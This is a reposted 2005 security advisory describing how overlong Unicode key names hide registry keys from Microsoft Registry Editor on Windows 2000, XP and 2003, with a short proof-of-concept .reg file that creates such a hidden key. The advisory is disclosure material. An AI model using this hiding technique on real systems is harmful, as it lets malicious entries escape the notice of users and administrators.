Ads Miscrosoft Registry Editor long string key hiding Wednesday, 31 August 2005 Summary Microsoft Registry Editor is an advanced tool for viewing and changing settings in your system registry, which contains information about how your computer runs. A large key name allow attackers to hide registry keys from users that uses the Microsoft Registry Editor. Credit: The information has been provided by "Andre Protas. Details Vulnerable Systems: * Microsoft Registry Editor Windows 2000 * Microsoft Registry Editor Windows XP * Microsoft Registry Editor Windows 2003 Server A design flaw in Microsoft Registry editor that support Unicode allow attackers to place a long key name (longer then the limited size of 255), and thus hide the key from Microsoft Registry Editor users. In order to exploit this issue, create an external .reg file and import it using regedit.exe: Proof of Concept: hiddenkey.reg: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoft 123456789012345678901234567890123456789012345678901234567 890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012 3456789012345678901234567890123456789012345678901234567890 12345678901234567890123456] Related Articles > BFCommand and Control, Battlefield 1942 and BFVietnam Multiple Vulnerabilities > Miscrosoft Registry Editor long string key hiding > Home Ftp Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal) > Buffer Overflow in LeapFTP (Long HOST in lsq) > Whisper32 Information Disclosure > Cisco Clean Access Authentication Bypass > Chris Moneymakers World Poker Championship Buffer Overflow > MDaemon Local Privileges Escalation > MyProxy Firewall Bypassing > McAfee Network Associates ePolicy Orchestrator Agent Privilege Escalation > Linksys WLAN Monitor Privilege Escalation > Hummingbird FTP Weak Password Encryption > WinFtp Server Unicode Buffer Overflow > NetworkActiv Web Server Directory Traversal > Ares FileShare Buffer Overflow Featured Articles > McAfee Network Associates ePolicy Orchestrator Agent Privilege Escalation > PHPXMLRPC and PEAR XML_RPC PHP Code Injection (2) > Linksys WRT54GS WPA Personal/TKIP Authentication Flaws > Internet Explorer Code Execution Through MIME Manipulation > MySQL UDF Multiple Vulnerabilities (Directory Traversal, DoS, Arbitrary Library Including, Buffer Overflow) > AWStats ShowInfoURL Remote Command Execution > Vulnerability in Telephony Service Allows Remote Code Execution (MS05-040) Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.